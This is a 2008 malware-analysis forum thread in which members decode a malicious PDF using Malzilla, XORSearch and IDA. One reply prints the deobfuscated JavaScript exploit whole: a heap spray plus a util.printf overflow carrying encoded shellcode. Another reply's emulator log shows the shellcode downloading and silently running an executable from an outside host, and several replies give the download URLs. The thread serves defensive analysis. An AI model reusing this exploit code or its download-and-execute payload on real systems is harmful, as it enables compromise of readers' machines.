Author Topic: PDF exploit issue  (Read 11179 times)

0 Members and 1 Guest are viewing this topic.

November 16, 2008, 06:34:17 am
Read 11179 times

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
Original pdf exploit file is index.pdf.
I've got the plain stream with bobby's inflater in 3.tmp.
I renamed it as FLevel.txt. and then I decoded it to second level as SLevel.txt.
But I'm confused with following shellcode. How to decode it?
Any thoughts?



November 16, 2008, 07:50:56 am
Reply #1

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Shellcode is XORed with 0xEE.
Here is the download URL from the shellcode after XORing it with 0xEE:
hxxp://79.135.167.18/cgi-bin/index.cgi?fc413c500100f07002123510f6067317db1d02b55afdb30001080400000000170

November 16, 2008, 02:03:47 pm
Reply #2

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
hi bobby

thnx 4 your help.
how did know the XOR value?
and how can I debug the shellcode?


November 16, 2008, 02:59:09 pm
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
how did know the XOR value?
and how can I debug the shellcode?

Download xorsearch from http://blog.didierstevens.com/programs/xorsearch/

Save the shellcode in Malzilla.

run "XORSearch.exe -si -l 1000 hexfile.bin http"


or load the shellcode into IDA Pro , disassemble and find the xor value
Ruining the bad guy's day

November 16, 2008, 04:30:44 pm
Reply #4

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
yep I got it~~

thnx SysAdMini


and I've catched another exploit.

how about this?

there's maybe an ALPHA2 compression level finally?

November 16, 2008, 05:20:49 pm
Reply #5

sowhat-x

  • Guest
That's as far I can get for the time being...
Code: [Select]
lemiros=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u3142%u354c%u544c%u4343%u4c49%u3648%u4b49%u434e%u5041%u3842%u5346%u504c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u4742%u544e%u4949%u5949%u3949%u4c43%u4f4d%u534a%u4a49%u3949%u3949%u4949%u3144%u4d49%u4945%u5144%u4e49%u4845%u3346%u5144%u4d49%u5941%u5144%u4441%u4144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u494c%u564c%u3144%u4e47%u4b49%u494c%u4644%u3144%u4d47%u584d%u4a4c%u5746%u4c4f%u4c50%u4c4a%u4144%u4a48%u394c%u5644%u3144%u464b%u4f43%u3947%u4c42%u364c%u434f%u4e4d%u3941%u4c42%u4c48%u314c%u3550%u494d%u4d4e%u374b%u5742%u4c42%u4c48%u4c47%u3144%u4546%u3144%u4d4f%u4b4d%u494c%u454c%u544a%u574a%u394c%u354a%u4a4c%u5542%u4f4f%u3144%u5941%u4144%u4d4f%u4845%u594c%u554c%u354a%u574a%u494b%u494c%u554a%u4144%u3949%u394c%u454c%u5144%u5643%u4144%u3650%u414c%u354f%u5947%u4144%u4449%u4f43%u594d%u4c42%u4741%u4c49%u5949%u3949%u4949%u414c%u554f%u4946%u4c4b%u4c4f%u4648%u4c50%u4645%u4c43%u4144%u3441%u4f43%u494a%u4c42%u5741%u4a46%u4949%u5949%u5949%u514c%u354f%u484c%u4c4f%u4d4f%u5149%u4a47%u5149%u4e4e%u3643%u3149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u4144%u5445%u4f43%u4b49%u4c4c%u4648%u4c50%u5745%u5550%u494d%u594c%u4c45%u4f4a%u4b47%u4f4e%u4550%u4d4d%u394c%u394d%u4e41%u4f4e%u3949%u3949%u4a4c%u4549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u4648%u4c50%u4645%u5144%u3445%u4c49%u4c4c%u3648%u4c50%u3649%u4c49%u3648%u4c50%u564d%u4a4c%u5549%u4345%u314e%u3549%u4e4e%u3642%u4c4a%u4c4b%u4c4f%u4c4c%u3648%u544b%u4c43%u4c42%u5344%u574b%u3747%u4a4c%u4549%u354c%u4741%u4b4f%u4648%u5648%u3648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u4949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u5949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u5949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u3949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u4746%u4742%u334c%u524f%u424f%u3644%u3645%u4743%u364a%u4744%u5641%u3647%u364f%u3743%u4250%u3643%u364f%u364d%u524f%u5747%u464f%u5744%u464b%u424f%u4647%u4645%u5746%u3645%u374a%u4645%u5250%u5742%u464a%u4742%u534f%u364a%u434d%u3343%u3341%u4842%u005a");
 var nades=unescape("%u0A0A%u0A0A");
 var makofamos=20;
 var nanor=makofamos+lemiros.length;
 while(nades.length<nanor)nades+=nades;
 var fadad=nades.substring(0,nanor);
 var lusibirasa=nades.substring(0,nades.length-nanor);
 while(lusibirasa.length+nanor<0x60000)lusibirasa=lusibirasa+lusibirasa+fadad;
 var vatekere=new Array();
 for(vener9=0;vener9<1200;vener9++)
 {
   vatekere[vener9]=lusibirasa+lemiros
 }
 var kekifidu1=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
 util.printf("%45000f",kekifidu1);

November 16, 2008, 05:36:05 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
how about this?

there's maybe an ALPHA2 compression level finally?

It's not simply xor encoded. Load it into IDA and you will see the algorithm.

But if you only wanna know what is does, then run it in Malzilla's shellcode analyzer.
Here ist the output.
Code: [Select]
verbose = 0
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(32)
stepcount 13829
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041714e =>
           = "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417162 =>
           = "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041716a =>
           = "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417175 =>
           = "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417182 =>
           = "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x00417189 =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x0012fe74 =>
         none;
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x0041719c =>
           = "http://beshragos.com/work/getexe.php?h=31";
     LPCTSTR szFileName = 0x0012fe74 =>
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fe74 =>
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;

Finished
Ruining the bad guy's day

November 16, 2008, 05:36:15 pm
Reply #7

sowhat-x

  • Guest
* sowhat-x thinks I got eventually...thanks to bobby and Malzilla's libemu bindings,he-he...  ;D

Code: [Select]
hxxp://beshragos.com/work/getexe.php?h=31

November 16, 2008, 05:37:01 pm
Reply #8

sowhat-x

  • Guest
Lmao - now that's what I call synchronization!  :)

November 16, 2008, 05:44:16 pm
Reply #9

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Lmao - now that's what I call synchronization!  :)

Nice. Same answer within 10 seconds :)
Ruining the bad guy's day

November 16, 2008, 05:49:33 pm
Reply #10

sowhat-x

  • Guest
Lol,got kinda confused with it...exactly what you said:
was testing different xor keys,until something kinda recognizable gets returned...
and when i understood this certainly couldn't be the case,i decided to go for the...
libemu one-click solution,he-he  :D

November 16, 2008, 06:11:19 pm
Reply #11

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
There are a couple of shellcodes where Malzilla's Shellcode analyzer can't help.
In such case, copy the shellcode to HexView page and click on Disassemble.
Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address, it means that from that address on there is a content that need to be decoded (e.g. XOR).
Scroll the disassembled content and search for first occurrence of XOR instruction, e.g. XOR [EPB], AL.
If XOR is using AL for XOR key, search what is put in AL. In most of the cases, just a couple of instructions before XOR, you should see an instruction which put something in AL (e.g. MOV AL, 0x000000EE). Now you got the XOR key.

Malzilla can do XOR decoding (HexView tab).

As for now, it can't do other operations that are also used for encrypting (ROR, ROL, ADD, SUB etc.)

November 16, 2008, 06:20:56 pm
Reply #12

sowhat-x

  • Guest
Quote
Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address,
it means that from that address on there is a content that need to be decoded (e.g. XOR).
Oh,that explains it now...doh,i'm an idiot,i thought that this error code,
was some kind of internal limitation of the disasm engine or something...  :P

November 16, 2008, 06:27:26 pm
Reply #13

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Quote
Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address,
it means that from that address on there is a content that need to be decoded (e.g. XOR).
Oh,that explains it now...doh,i'm an idiot,i thought that this error code,
was some kind of internal limitation of the disasm engine or something...  :P
You will get same error message in that case too.
Unfortunately, I use some older version of libdisassm - 0.21-pre1 ( http://bastard.sourceforge.net/libdisasm.html ), as there is no newer Pascal port of it.
I can update it, but now I have some more important items on Malzilla's ToDo list (working on Malzilla 2.0 - total rewrite of the engine, based on real DOM parser, which means that we wouldn't need Kalimero anymore, as Malzilla will know how to deal with e.g. GetElementById etc.)

November 17, 2008, 03:16:01 am
Reply #14

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
long time no see~~ sowhat-x ;)

I've also got some error message from shellcode analyser as following:

Code: [Select]
verbose = 0
cpu error error accessing 0x42363501 not mapped

stepcount 16

Finished

and XORSearch & Malzilla's HexView are good for finding XOR value~~